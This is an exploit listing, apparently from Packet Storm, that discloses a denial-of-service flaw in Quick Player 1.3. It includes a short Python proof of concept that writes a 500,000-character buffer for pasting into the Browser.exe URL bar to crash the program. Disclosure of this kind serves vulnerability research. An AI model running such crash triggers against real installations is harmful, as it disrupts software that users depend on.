Quick Player version 1.3 suffers from a denial of service vulnerability.
286bf64e77c4c5d59437659d61217a58b6f0141b0cd1bb2bed028ef7c48a678e# Exploit Title: Quick Player 1.3 - 'Browser.exe' Denial of Service
# Date: 06/05/2020
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html
# Version: 1.3
# Tested on: Windows 7
# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "poc.txt"
# 2.- Open the application "Browser.exe"
# 3.- Paste the contents of "poc.txt" within the url bar
# 4.- Crashed
# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Quick-Player-Browser-dos/
# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings7/2.gif
buffer = "A" * 500000
f = open ("poc.txt", "w")
f.write(buffer)
f.close()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed